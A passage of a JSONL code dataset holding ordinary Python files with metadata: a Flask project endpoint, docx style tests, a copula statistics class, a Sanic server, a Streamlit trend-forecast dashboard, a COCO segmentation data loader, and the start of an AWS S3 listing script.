import_name=__name__)\n\nlogger = get_logger()\n\n\nclass Project_opt(MethodView):\n\n def check_project_name(self, db, data):\n project_name = data.get('project_name').strip()\n flag = True\n error = ''\n\n if len(project_name) == 0:\n flag = False\n error = '项目名称不可为空!'\n elif len(project_name) > project_name_length:\n flag = False\n error = '创建的项目名称过长!'\n elif db.query(Project).filter(Project.project_name == project_name).first():\n flag = False\n error = '该项目名称已经存在!'\n\n return flag, error\n\n def check_project_description(self, data):\n project_description = data.get('project_description').strip()\n flag = True\n error = ''\n\n if len(project_description) > project_description_length:\n flag = False\n error = '创建的项目描述过长!'\n\n return flag, error\n\n def post(self):\n db = get_db()\n status_code = 201\n ret = {}\n\n data = request.form.to_dict()\n # 验证项目名称\n flag, error = self.check_project_name(db, data)\n if not flag:\n return {'error': error}, 422\n # 验证项目描述\n flag, error = self.check_project_description(data)\n if not flag:\n return {'error': error}, 422\n # 添加项目数据\n data['user_id'] = session.get('user_id')\n save_data_to_db(db, [Project(**data)])\n\n return ret, status_code\n\n\napp.add_url_rule(rule='/api/manager/project/', endpoint='project', 
view_func=Project_opt.as_view(name='project'))\n","sub_path":"Blueprint/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"264239965","text":"from nose.tools import istest, assert_equal\n\nfrom mammoth.docx.xmlparser import element as xml_element\nfrom mammoth.docx.styles_xml import read_styles_xml_element\n\n\n@istest\ndef paragraph_style_is_null_if_no_style_with_that_id_exists():\n element = xml_element(\"w:styles\")\n styles = read_styles_xml_element(element)\n assert_equal(None, styles.find_paragraph_style_by_id(\"Heading1\"))\n\n\n@istest\ndef paragraph_style_can_be_found_by_id():\n element = xml_element(\"w:styles\", {}, [\n _paragraph_style_element(\"Heading1\", \"Heading 1\"),\n ])\n styles = read_styles_xml_element(element)\n assert_equal(\n \"Heading1\",\n styles.find_paragraph_style_by_id(\"Heading1\").style_id\n )\n\n\n@istest\ndef character_style_can_be_found_by_id():\n element = xml_element(\"w:styles\", {}, [\n _character_style_element(\"Heading1Char\", \"Heading 1 Char\"),\n ])\n styles = read_styles_xml_element(element)\n assert_equal(\n \"Heading1Char\",\n styles.find_character_style_by_id(\"Heading1Char\").style_id\n )\n\n\n@istest\ndef paragraph_and_character_styles_are_distinct():\n element = xml_element(\"w:styles\", {}, [\n _paragraph_style_element(\"Heading1\", \"Heading 1\"),\n _character_style_element(\"Heading1Char\", \"Heading 1 Char\"),\n ])\n styles = read_styles_xml_element(element)\n assert_equal(None, styles.find_character_style_by_id(\"Heading1\"))\n assert_equal(None, styles.find_paragraph_style_by_id(\"Heading1Char\"))\n\n\n@istest\ndef styles_include_names():\n element = xml_element(\"w:styles\", {}, [\n _paragraph_style_element(\"Heading1\", \"Heading 1\"),\n ])\n styles = read_styles_xml_element(element)\n assert_equal(\n \"Heading 1\",\n styles.find_paragraph_style_by_id(\"Heading1\").name\n )\n\n\n@istest\ndef style_name_is_none_if_name_element_does_not_exist():\n element = xml_element(\"w:styles\", {}, [\n _style_without_name_element(\"paragraph\", \"Heading1\"),\n _style_without_name_element(\"character\", \"Heading1Char\")\n ])\n styles = read_styles_xml_element(element)\n assert_equal(None, styles.find_paragraph_style_by_id(\"Heading1\").name)\n assert_equal(None, styles.find_character_style_by_id(\"Heading1Char\").name)\n\n\ndef _paragraph_style_element(style_id, name):\n return _style_element(\"paragraph\", style_id, name)\n\ndef _character_style_element(style_id, name):\n return _style_element(\"character\", style_id, name)\n\ndef _style_element(element_type, style_id, name):\n children = [xml_element(\"w:name\", {\"w:val\": name}, [])]\n return _style_element_with_children(element_type, style_id, children)\n\ndef _style_without_name_element(element_type, style_id):\n return _style_element_with_children(element_type, style_id, [])\n\ndef _style_element_with_children(element_type, style_id, children):\n attributes = {\"w:type\": element_type, \"w:styleId\": style_id}\n return xml_element(\"w:style\", attributes, children)\n","sub_path":"tests/docx/styles_xml_tests.py","file_name":"styles_xml_tests.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"45245524","text":"##\n# \\brief Pair Copula.\n# Bivariate distribution base class.\nfrom __future__ import print_function, absolute_import\nimport numpy as np\nfrom six 
import iteritems\nfrom scipy.stats import kendalltau, spearmanr, pearsonr\nfrom scipy.stats import gaussian_kde\nfrom scipy.stats.mstats import rankdata\n# COPULA IMPORTS\ntry:\n from starvine.bvcopula.copula_factory import Copula\nexcept:\n from copula_factory import Copula\n\n\nclass PairCopula(object):\n \"\"\"!\n @brief Stores bivariate data for pair copula construction.\n Contains methods to:\n - rank data transform\n - rotate data\n - remove nan or inf data points\n - plot bivarate data\n - fit copula to bivariate (ranked) data\n - compute basic bivariate statistics (eg. kendall's tau)\n\n Note: Depends on pandas for some useful statistical and plotting\n functionality.\n \"\"\"\n def __init__(self, x, y, weights=None, **kwargs):\n \"\"\"!\n @brief Bivariate data set init.\n @param x np_1darray first marginal data set\n @param y np_1darray second marginal data set\n @param weights np_1darray (optional) data weights\n normalized or unormalized weights accepted\n Note: len(u) == len(v) == len(weights)\n \"\"\"\n self.copulaModel, self.copulaParams = None, (None, None, )\n #\n self.id = kwargs.pop(\"id\", None)\n self.x = np.array(x)\n self.y = np.array(y)\n self.u, self.v = None, None # ranked data\n # normalize weights (weights must sum to 1.0)\n self.weights = weights\n if self.weights is not None:\n self.weights = self.weights / np.sum(self.weights)\n # init default copula family\n \"\"\"\n TODO: fix rotated gumbel copula\n defaultFamily = {'t': 0,\n 'gauss': 0,\n 'frank': 0,\n 'frank-90': 1,\n 'frank-180': 2,\n 'frank-270': 3,\n 'gumbel': 0,\n 'gumbel-90': 1,\n 'gumbel-180': 2,\n 'gumbel-270': 3,\n 'clayton': 0,\n 'clayton-90': 1,\n 'clayton-180': 2,\n 'clayton-270': 3,\n }\n \"\"\"\n defaultFamily = {'t': 0,\n 'gauss': 0,\n 'frank': 0,\n 'frank-90': 1,\n 'frank-180': 2,\n 'frank-270': 3,\n 'clayton': 0,\n 'clayton-90': 1,\n 'clayton-180': 2,\n 'clayton-270': 3,\n 'gumbel': 0,\n 'gumbel-90': 1,\n 'gumbel-180': 2,\n 'gumbel-270': 3,\n }\n #\n self.setTrialCopula(kwargs.pop(\"family\", defaultFamily))\n # Rank transform data\n self.rank(kwargs.pop(\"rankMethod\", 0))\n # default rotation\n self.setRotation(kwargs.pop(\"rotation\", 0))\n self.rotateData(self.u, self.v)\n\n def rank(self, method=0):\n \"\"\"!\n @brief rank transfom the data\n @param method int\n if == 0: use standard rank transform,\n else: use CDF data transform.\n \"\"\"\n self.rankMethod = method\n if method == 0:\n self.u = rankdata(self.x) / (len(self.x) + 1)\n self.v = rankdata(self.y) / (len(self.y) + 1)\n else:\n # use alternate CDF rank transform method\n kde_x = gaussian_kde(self.x)\n kde_y = gaussian_kde(self.y)\n u_hat = np.zeros(len(self.x))\n v_hat = np.zeros(len(self.y))\n for i, (xp, yp) in enumerate(zip(self.x, self.y)):\n u_hat[i] = kde_x.integrate_box_1d(-np.inf, xp)\n v_hat[i] = kde_y.integrate_box_1d(-np.inf, yp)\n self.u = u_hat\n self.v = v_hat\n\n def rankInv(self):\n \"\"\"!\n @brief Inverse rank transform data\n back to original scale.\n \"\"\"\n pass\n\n def setTrialCopula(self, family):\n self.trialFamily = family\n self.copulaBank = {}\n for name, rotation in iteritems(self.trialFamily):\n self.copulaBank[name] = Copula(name, rotation)\n\n def empKTau(self):\n \"\"\"!\n @brief Returns emperical kendall's tau of rank transformed data.\n @return float Kendall's tau rank correlation coeff\n \"\"\"\n self.empKTau_, self.pval_ = kendalltau(self.UU, self.VV)\n return self.empKTau_, self.pval_\n\n def empSRho(self):\n \"\"\"!\n @brief Returns emperical spearman rho, the rank correlation 
coefficient.\n @return float Spearman's rank correlation coeff\n \"\"\"\n self.empSRho_, self.pval_ = spearmanr(self.u, self.v)\n return self.empSRho_, self.pval_\n\n def empPRho(self):\n \"\"\"!\n @brief Returns linear correlation coefficient, pearson's rho.\n @return float pearson's correlation coefficient\n \"\"\"\n self.empPRho_, self.pval_ = pearsonr(self.x, self.y)\n return self.empPRho_, self.pval_\n\n def copulaTournament(self, criterion='AIC', **kwargs):\n \"\"\"!\n @brief Determines the copula that best fits the rank transformed data\n based on the AIC criterion.\n All Copula in self.trialFamily set are considered.\n \"\"\"\n vb = kwargs.pop(\"verbosity\", True)\n self.empKTau()\n if self.pval_ >= 0.05 and self.weights is None:\n print(\"Independence Coplua selected\")\n goldCopula = self.copulaBank[\"gauss\"]\n goldParams = self.fitCopula(goldCopula)\n self.copulaModel = goldCopula\n self.copulaParams = goldParams\n if vb: print(\"ID: %s. %s copula selected. fitted params=\"\n % (str(self.id), goldCopula.name) + str(goldParams[1]))\n if vb: print(\"-------------------------------------------\")\n # return self.copulaBank['indep']\n return (self.copulaModel, self.copulaParams)\n # Find best fitting copula as judged by the AIC\n maxAIC, goldCopula, goldParams = 0, None, None\n for trialCopulaName, rotation in iteritems(self.trialFamily):\n if vb: print(\"Fitting trial copula \" + trialCopulaName + \"...\", end=\"\")\n copula = self.copulaBank[trialCopulaName]\n fittedCopulaParams = self.fitCopula(copula)\n trialAIC = abs(fittedCopulaParams[2])\n if vb: print(\" |AIC|: \" + str(trialAIC))\n if trialAIC > maxAIC:\n goldCopula = copula\n goldParams = fittedCopulaParams\n maxAIC = trialAIC\n if vb: print(\"ID: %s. %s copula selected. fitted params=\"\n % (str(self.id), goldCopula.name) + str(goldParams[1])\n + \" rotation=\" + str(goldParams[3]))\n if vb: print(\"-------------------------------------------\")\n self.copulaModel = goldCopula\n self.copulaParams = goldParams\n return (self.copulaModel, self.copulaParams)\n\n def fitCopula(self, copula, thetaGuess=(None, None, )):\n \"\"\"!\n @brief fit specified copula to data.\n @param copula CopulaBase Copula instance\n @param thetaGuess tuple (optional) initial guess for copula params\n @return (copula type string, fitted copula params np_array)\n \"\"\"\n thetaHat, successFlag = copula.fitMLE(self.UU, self.VV, *thetaGuess, weights=self.weights)\n if successFlag:\n AIC = copula._AIC(self.UU, self.VV, 0, *thetaHat, weights=self.weights)\n else:\n AIC = 0\n self.copulaModel = copula\n return (copula.name, thetaHat, AIC, copula.rotation, successFlag)\n\n def rotateData(self, u, v, rotation=-1):\n \"\"\"!\n @brief Rotates the ranked data on the unit square.\n @param u Ranked data vector\n @param v Ranked data vector\n @param rotation int 1==90deg, 2==180deg, 3==270, 0==0deg\n \"\"\"\n if rotation >= 0:\n self.setRotation(rotation)\n self.UU = np.zeros(u.shape) # storage for rotated u\n self.VV = np.zeros(v.shape) # storage for rotated v\n if self.rotation == 1:\n # 90 degree rotation (flip U)\n self.UU = 1.0 - u\n self.VV = v + 1 - 1\n elif self.rotation == 2:\n # 180 degree rotation (flip U, flip V)\n self.UU = 1.0 - u\n self.VV = 1.0 - v\n elif self.rotation == 3:\n # 270 degree rotation (flip V)\n self.UU = u + 1 - 1\n self.VV = 1.0 - v\n else:\n self.UU = u + 1 - 1\n self.VV = v + 1 - 1\n return (self.UU, self.VV)\n\n def setRotation(self, rotation=0):\n \"\"\"!\n @brief Set the copula's orientation:\n 0 == 0 deg\n 1 == 90 deg 
rotation\n 2 == 180 deg rotation\n 3 == 270 deg rotation\n Allows for modeling negative dependence with the\n frank, gumbel, and clayton copulas (Archimedean Copula family is\n non-symmetric)\n \"\"\"\n if rotation < 0 or rotation > 3:\n print(\"Invalid Rotation: Valid roations are in [0, 1, 2, 3]\")\n raise RuntimeError\n self.rotation = rotation\n","sub_path":"starvine/bvcopula/pc_base.py","file_name":"pc_base.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"476011873","text":"from sanic import Sanic\nfrom api import api_v1\nimport configparser\n\nfrom sanic_cors import CORS, cross_origin\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\napp = Sanic('engine')\napp.blueprint(api_v1)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": config['app']['origins'].split(',')}})\n# CORS(app)\n\nif __name__ == \"__main__\":\n app.run(\n debug=config['app']['debug'] == 'true',\n host=config['app']['host'],\n port=int(config['app']['port']),\n workers=int(config['app']['workers'])\n )\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"564757055","text":"import streamlit as st\nimport pandas as pd\nimport altair as alt\nimport numpy as np\nfrom sqlalchemy import create_engine\nimport base64\nfrom datetime import date\n\nimport toml\n#data_toml = toml.load(\"config.toml\")\naccurancy = st.secrets['accurancy']\n\nrange_forecast = st.secrets['range_forecast']\ngreater_than_trend = st.secrets['greater_than_trend']\ngreater_than_feracast = st.secrets['greater_than_feracast']\nsite_url = st.secrets['site_url']\nn_keywords = st.secrets['n_keywords']\n\nhost = st.secrets['host']\ndatabase = st.secrets['database']\nuser = st.secrets['user']\npassword = st.secrets['password']\nport= st.secrets['port']\npostgre_complete_url = st.secrets['postgre_complete_url']\n\n\ndef _max_width_():\n max_width_str = f\"max-width: 1500px;\"\n st.markdown(\n f\"\"\"\n \n \"\"\",\n unsafe_allow_html=True, \n )\n_max_width_()\n\nhide_streamlit_style = \"\"\"\n \n \"\"\"\nst.markdown(hide_streamlit_style, unsafe_allow_html=True)\n\n#Intestazione Pagina\n#\n#\nst.title('Predict Dashboard')\n\n#H1\nst.write('Previsione dei trend')\n\n# creazione df geerale\nengine = create_engine(postgre_complete_url)\ndf_general = pd.read_sql_query(f\"SELECT * FROM wtforecastgeneral WHERE site = '{site_url}';\",con=engine)\n\n#df trend\ndf_trend = df_general.copy()\ndf_to_graph = None\nfor index, row in df_trend.iterrows():\n gt_dates_trend = df_trend['gt_dates']\n df_dit = pd.DataFrame.from_dict(row['gt_dates'], orient='columns')\n df_dit['index'] = pd.to_datetime(df_dit['index'], unit='ms')\n df_dit = df_dit.T\n new_header = df_dit.iloc[0]\n df_dit = df_dit[1:]\n df_dit.columns = new_header\n if df_to_graph is not None:\n df_to_graph = pd.concat([df_to_graph, df_dit], ignore_index=True)\n else:\n df_to_graph = df_dit.copy()\ntotal_trend = df_to_graph.sum()\ntotal_trend = total_trend.to_frame()\ntotal_trend.reset_index(inplace=True)\ntotal_trend = total_trend.rename(columns={'index': 'date',0: 'trend' })\ntotal_trend['date'] = total_trend['date'].astype('datetime64[ns]')\ntotal_trend['trend'] = total_trend['trend'].astype('float')\n#total_trend\nchart_trend = alt.Chart(total_trend).mark_line().encode(\n x=alt.X('date'),\n y=alt.Y('trend')\n).properties(title=\"Google 
Trend\")\ngtrend_regline_chart = chart_trend + chart_trend.transform_regression('date', 'trend').mark_line()\n#st.altair_chart(gtrend_regline_chart, use_container_width=True)\n\n# df predict\ndf_predict = df_general.copy()\ndf_to_graph = None\nfor index, row in df_predict.iterrows():\n gt_dates_predict = df_predict['forecast_dates']\n df_dit = pd.DataFrame.from_dict(row['forecast_dates'], orient='columns')\n df_dit['index'] = pd.to_datetime(df_dit['index'], unit='ms')\n df_dit = df_dit.T\n new_header = df_dit.iloc[0]\n df_dit = df_dit[1:]\n df_dit.columns = new_header\n if df_to_graph is not None:\n df_to_graph = pd.concat([df_to_graph, df_dit], ignore_index=True)\n else:\n df_to_graph = df_dit.copy()\ntotal_predict = df_to_graph.sum()\ntotal_predict = total_predict.to_frame()\ntotal_predict.reset_index(inplace=True)\ntotal_predict = total_predict.rename(columns={'index': 'date',0: 'predict' })\ntotal_predict['date'] = total_predict['date'].astype('datetime64[ns]')\ntotal_predict['predict'] = total_predict['predict'].astype('float')\n#total_predict\n\nchart_predict = alt.Chart(total_predict).mark_line().encode(\n x=alt.X('date'),\n y=alt.Y('predict')\n).properties(title=\"Trend Forecast\")\ngtrend_regline_chart = chart_predict + chart_predict.transform_regression('date', 'predict').mark_line()\n#st.altair_chart(gtrend_regline_chart, use_container_width=True)\n\n# Full Chart\nfull_df = pd.merge(total_predict, total_trend, left_on='date', right_on='date', how='left')\n#full_df\na = alt.Chart(full_df).mark_area(opacity=0.6, color='#25f4ee').encode(x='date', y='trend')\nb = alt.Chart(full_df).mark_area(opacity=1, color='#fe2c55').encode(x='date', y='predict')\nc = alt.layer(b, a).properties(title=\"Forecast and Trend Comparison\")\n\nst.write('Legenda: azzurro Google Trends, rosso Previsionale')\nst.altair_chart(c, use_container_width=True)\n\n\nst.write('---------------------------------------------------')\n\n#\n#\n# Tabelle generali\n\n# creazione df generale\nengine_table = create_engine(postgre_complete_url)\ndf_general_table = pd.read_sql_query(f\"SELECT * FROM wtforecastdetails WHERE site = '{site_url}' AND type_gt_or_forecast = 'type_gt' AND gt_accuracy <= {accurancy};\",con=engine_table)\n\nst.write('Trend Attuali')\ndf_last_trend = df_general_table.copy()\ndf_last_trend = df_last_trend[['keyword','ga_search_volume','ga_competition','gsc_avg_pos','gsc_sum_imp','gsc_sum_clic','last_trend','gsc_page']].copy()\n#df_last_trend\ndf_last_trend = df_last_trend.sort_values(by=['ga_search_volume','ga_competition'], ascending=False)\nst.dataframe(data=df_last_trend, width=1500, height=768)\n\n\ndef get_table_download_link_csv(df_last_trend):\n csv = df_last_trend.to_csv(sep=';', decimal=',', index=False).encode('UTF-8')\n b64 = base64.b64encode(csv).decode()\n today = date.today()\n d4 = today.strftime(\"%b-%d-%Y\")\n href = f'Download'\n return href\nst.markdown(get_table_download_link_csv(df_last_trend), unsafe_allow_html=True)\nst.write('---------------------------------------------------')\n\n\nengine_table = create_engine(postgre_complete_url)\ndf_general_table = pd.read_sql_query(f\"SELECT * FROM wtforecastdetails WHERE site = '{site_url}' AND type_gt_or_forecast = 'type_forecast' AND gt_accuracy <= {accurancy};\",con=engine_table)\n\nst.write('Trend Futuri')\ndf_last_forecast = df_general_table.copy()\ndf_last_forecast = 
df_last_forecast[['keyword','ga_search_volume','ga_competition','gsc_avg_pos','gsc_sum_imp','gsc_sum_clic','last_forecast','gsc_page']].copy()\n#df_last_forecast\ndf_last_forecast = df_last_forecast.sort_values(by=['ga_search_volume','ga_competition'], ascending=False)\nst.dataframe(data=df_last_forecast, width=1500, height=768)\n\ndef get_table_download_link_csv(df_last_forecast):\n csv = df_last_forecast.to_csv(sep=';', decimal=',', index=False).encode('UTF-8')\n b64 = base64.b64encode(csv).decode()\n today = date.today()\n d4 = today.strftime(\"%b-%d-%Y\")\n href = f'Download'\n return href\nst.markdown(get_table_download_link_csv(df_last_forecast), unsafe_allow_html=True)\n\n\n\n","sub_path":"11_streamlit_sharing.py","file_name":"11_streamlit_sharing.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"54855122","text":"import torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport torchvision.transforms as transforms\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom PIL import Image, ImageDraw\r\nimport os\r\nimport torchvision\r\n\r\ndef imshow(img):\r\n img = img / 2 + 0.5 # unnormalize\r\n npimg = img.numpy()\r\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\r\n \r\n\r\nclass CocoData(Dataset):\r\n \"\"\"\r\n Args:\r\n root (string): Root directory where images are downloaded to.\r\n annFile (string): Path to json annotation file.\r\n transform (callable, optional): A function/transform that takes in an PIL image\r\n and returns a transformed version. E.g, ``transforms.ToTensor``\r\n target_transform (callable, optional): A function/transform that takes in the\r\n target and transforms it.\r\n category_names : name of the categories desired dataset consists\r\n final_img_size : Dataset image size, default: 128\r\n \r\n \r\n Return: \r\n 'image' : 3x128x128\r\n 'segmentation mask' : num_catx128x128 --- only one instance for specific category (one instance for each category)\r\n 'category' : multiple categories (e.g. zebra, giraffe)\r\n \r\n \"\"\"\r\n\r\n def __init__(self, root, annFile, transform=None, target_transform=None, category_names = None, final_img_size=128, time_step=1):\r\n from pycocotools.coco import COCO\r\n self.root = root\r\n self.coco = COCO(annFile)\r\n self.ids = list(self.coco.imgs.keys())\r\n self.transform = transform\r\n self.target_transform = target_transform\r\n self.final_img_size = final_img_size \r\n self.time_step = time_step\r\n self.transform2 = transforms.Compose([\r\n transforms.Scale((final_img_size,final_img_size)),\r\n transforms.ToTensor(),\r\n ])\r\n \r\n \r\n if category_names == None:\r\n self.category = None\r\n self.ids = list(self.coco.imgs.keys())\r\n else:\r\n self.category = self.coco.getCatIds(catNms=category_names) #e.g. [22,25]\r\n \r\n self.ids = []\r\n self.cat = []\r\n for x in self.category:\r\n self.ids += self.coco.getImgIds(catIds=x )\r\n self.cat += [x]*len(self.coco.getImgIds(catIds=x )) #e.g. [22,22,...,22]\r\n\r\n \r\n def __getitem__(self, index):\r\n \"\"\"\r\n Args:\r\n index (int): Index\r\n\r\n Returns:\r\n tuple: Tuple (image, target). 
target is the object returned by ``coco.loadAnns``.\r\n \"\"\"\r\n coco = self.coco\r\n #Delete next line \r\n #index = 572 + 109\r\n img_id = self.ids[index]\r\n \r\n ann_ids = coco.getAnnIds(imgIds=img_id)\r\n target = coco.loadAnns(ann_ids)\r\n path = coco.loadImgs(img_id)[0]['file_name']\r\n \r\n #print(img_id)\r\n \r\n img = Image.open(os.path.join(self.root, path)).convert('RGB')\r\n img_size = img.size\r\n img_size_x = img_size[0]\r\n img_size_y = img_size[1]\r\n #seg_masks = torch.zeros([len(self.category),self.final_img_size,self.final_img_size])\r\n \r\n instance_types = []\r\n \r\n for i in range(len(target)): \r\n instance = target[i]\r\n instance_types.append(instance['category_id'])\r\n\r\n idx_list = [i for i in range(len(instance_types)) if (instance_types[i] in self.category and len(target[i]['segmentation'])==1)]\r\n num_object = len(idx_list)\r\n \r\n seg_masks = torch.zeros([num_object,len(self.category),self.final_img_size,self.final_img_size])\r\n bboxes = torch.zeros([num_object,len(self.category),self.final_img_size,self.final_img_size])\r\n ins_area = torch.zeros([num_object])\r\n \r\n fg_category = 9999*torch.ones([num_object])\r\n for i in range(num_object): \r\n idx = idx_list[np.random.choice(len(idx_list),1)[0]]\r\n idx_list.remove(idx)\r\n instance = target[idx]\r\n \r\n ins_area[i] = instance['area']/(img_size_x*img_size_y)\r\n \r\n mask = Image.new('L', (img_size_x, img_size_y))\r\n for j in range(len(instance['segmentation'])):\r\n poly = instance['segmentation'][j]\r\n ImageDraw.Draw(mask).polygon(poly, outline=1, fill=1)\r\n \r\n mask= self.transform2(mask)\r\n if torch.max(mask) != 0:\r\n mask = mask/torch.max(mask)\r\n \r\n seg_masks[i,self.category.index(instance['category_id']),:,:] = mask.squeeze(0)\r\n fg_category[i] = self.category.index(instance['category_id'])\r\n \r\n bbox = instance['bbox']\r\n bbox_mask = Image.new('L', (img_size_x, img_size_y))\r\n ImageDraw.Draw(bbox_mask).rectangle([bbox[0],bbox[1],bbox[0]+bbox[2],bbox[1]+bbox[3]], outline=1, fill=1)\r\n bbox_mask= self.transform2(bbox_mask)\r\n if torch.max(bbox_mask) != 0:\r\n bbox_mask = bbox_mask/torch.max(bbox_mask)\r\n bboxes[i,self.category.index(instance['category_id']),:,:] = bbox_mask.squeeze(0)\r\n \r\n if self.transform is not None:\r\n img = self.transform(img)\r\n\r\n\r\n\r\n seg_masks = torch.clamp(seg_masks,0,1)\r\n bboxes = torch.clamp(bboxes,0,1)\r\n \r\n sample = {'image': img, 'seg_mask': seg_masks, 'bboxes': bboxes, 'fg_category': fg_category, 'num_object':num_object, 'ins_area':ins_area}\r\n return sample\r\n\r\n def __len__(self):\r\n return len(self.ids)\r\n\r\n def discard_small(self, min_area, max_area=1):\r\n #category_id = self.coco.getCatIds(catNms=category_name)\r\n temp = []\r\n for img_id in self.ids:\r\n ann_ids = self.coco.getAnnIds(imgIds=img_id)\r\n target = self.coco.loadAnns(ann_ids)\r\n instance_types = []\r\n valid_mask = False\r\n \r\n path = self.coco.loadImgs(img_id)[0]['file_name']\r\n img = Image.open(os.path.join(self.root, path))\r\n img_size = img.size\r\n img_size_x = img_size[0]\r\n img_size_y = img_size[1]\r\n\r\n total_fg_area = 0\r\n total_fg_area_relevant = 0\r\n \r\n for i in range(len(target)): \r\n instance = target[i]\r\n total_fg_area += instance['area']\r\n instance_types.append(instance['category_id'])\r\n if instance['category_id'] in self.category and len(instance['segmentation'])==1:\r\n total_fg_area_relevant += instance['area']\r\n valid_mask = True\r\n if (instance['category_id'] in self.category) and 
(type(instance['segmentation']) is not list):\r\n valid_mask = False\r\n break \r\n\r\n if valid_mask and total_fg_area_relevant/(img_size_x*img_size_y) > min_area and total_fg_area/(img_size_x*img_size_y) < max_area:\r\n temp.append(img_id)\r\n \r\n print(str(len(self.ids)) + '-->' + str(len(temp)))\r\n self.ids = temp\r\n \r\n\r\n def discard_bad_examples(self, path): \r\n file_list = open(path, \"r\")\r\n bad_examples = file_list.readlines()\r\n for i in range(len(bad_examples)):\r\n bad_examples[i] = int(bad_examples[i][:-1])\r\n\r\n temp = []\r\n for img_id in self.ids:\r\n if not (img_id in bad_examples):\r\n temp.append(img_id)\r\n \r\n print(str(len(self.ids)) + '-->' + str(len(temp)))\r\n self.ids = temp\r\n print('Bad examples are left out!') \r\n\r\n def discard_num_objects(self,num_min_obj=0, num_max_obj=1):\r\n \r\n temp = []\r\n for img_id in self.ids:\r\n ann_ids = self.coco.getAnnIds(imgIds=img_id)\r\n target = self.coco.loadAnns(ann_ids)\r\n instance_types = []\r\n \r\n for i in range(len(target)): \r\n instance = target[i]\r\n instance_types.append(instance['category_id'])\r\n \r\n idx_list = [i for i in range(len(instance_types)) if (instance_types[i] in self.category and len(target[i]['segmentation'])==1)]\r\n num_object = len(idx_list)\r\n \r\n if num_object>num_min_obj and num_object <= num_max_obj:\r\n temp.append(img_id)\r\n \r\n print(str(len(self.ids)) + '-->' + str(len(temp)))\r\n self.ids = temp\r\n \r\n \r\n#-------------------------Example-----------------------------------------\r\nif __name__ == '__main__':\r\n transform = transforms.Compose([transforms.Resize((128,128)),\r\n transforms.ToTensor(),\r\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\r\n ]) \r\n dataset = CocoData(root = 'C:/Users/motur/coco/images/train2017',\r\n annFile = 'C:/Users/motur/coco/annotations/instances_train2017.json',\r\n category_names = ['giraffe','elephant','zebra','sheep','cow','bear'],\r\n transform=transform, time_step = 5)\r\n \r\n #dataset.discard_small(0.01)\r\n train_loader = DataLoader(dataset, batch_size=1, shuffle=False) \r\n print('Number of samples: ', len(dataset))\r\n #Discarding images contain small instances \r\n dataset.discard_small(min_area=0.0, max_area= 1)\r\n #dataset.discard_bad_examples('bad_examples_list.txt')\r\n #dataset.discard_num_objects()\r\n\r\n path1 = 'C:/Users/motur/coco/mask/bbox_sheep/'\r\n path2 = 'C:/Users/motur/coco/images_gt/gt_train_2/'\r\n \r\n num_object = []\r\n MIN_AREA = 0.01\r\n count = 0\r\n for num_iter, sample_batched in enumerate(train_loader,0):\r\n #image= sample_batched['image'][0]\r\n #imshow(torchvision.utils.make_grid(image))\r\n num_object.append(sample_batched['num_object'][0])\r\n #plt.pause(0.001)\r\n #y_all = sample_batched['seg_mask'][0]\r\n #bbox_all = sample_batched['bboxes'][0]\r\n #ins_area = sample_batched['ins_area'][0]\r\n #num_fg_obj = y_all.size()[0]\r\n #torchvision.utils.save_image(image, path2 + str(count) + '.png', nrow=1, padding=0, normalize=True, range=None, scale_each=False, pad_value=0)\r\n count +=1 \r\n\r\n# imshow(torchvision.utils.make_grid(mask[0,0,:,:]))\r\n# plt.pause(0.001)\r\n# imshow(torchvision.utils.make_grid(mask[0,1,:,:]))\r\n# plt.pause(0.001)\r\n# imshow(torchvision.utils.make_grid(mask[1,0,:,:]))\r\n# plt.pause(0.001)\r\n# imshow(torchvision.utils.make_grid(mask[1,1,:,:]))\r\n# plt.pause(0.001)\r\n #print(sample_batched['num_object'][0])\r\n #print(sample_batched['fg_category'][0])\r\n# for t in range(num_fg_obj):\r\n# y_ = y_all[t,:,:,:]\r\n# y_reduced = 
torch.sum(y_,0).clamp(0,1).view(1,128,128)\r\n# bbox_ = bbox_all[t,:,:,:]\r\n# bbox_reduced = torch.sum(bbox_,0).clamp(0,1).view(1,128,128)\r\n# \r\n# if ins_area[t]>MIN_AREA:\r\n# fixed_p1 = path1 + str(count) + '.png'\r\n# fixed_p2 = path2 + str(count) + '.png'\r\n# count += 1\r\n# torchvision.utils.save_image(bbox_reduced, fixed_p1, nrow=1, padding=0, normalize=True, range=None, scale_each=False, pad_value=0)\r\n# torchvision.utils.save_image(y_reduced, fixed_p2, nrow=1, padding=0, normalize=True, range=None, scale_each=False, pad_value=0)\r\n \r\n \r\n num_object = np.array(num_object)\r\n print(np.max(num_object))\r\n print(np.mean(num_object))\r\n print(np.median(num_object))\r\n plt.hist(num_object)\r\n plt.xticks(range(1, 22))\r\n plt.show()\r\n plt.savefig('num_obj.png')\r\n \r\n \r\n","sub_path":"data_loader_bgfg_2.py","file_name":"data_loader_bgfg_2.py","file_ext":"py","file_size_in_byte":11992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"477646817","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport subprocess\nimport time\nimport os\nimport time\nimport re\nimport sys\nfrom IPython.display import clear_output\n\n\nclass Empty_File_S3():\n \n def __init__(self,bucket=\"testinternalrealestate\",exclude=[],condo=False):\n self.bucket = bucket\n self.exclude = exclude\n self.condo = condo\n \n def get_list(self):\n exclude = self.exclude\n condo = self.condo\n cmdln = \"aws s3 ls s3://\" + self.bucket +\"/ --region us-east-2 \"\n p = subprocess.Popen(cmdln, shell=True, 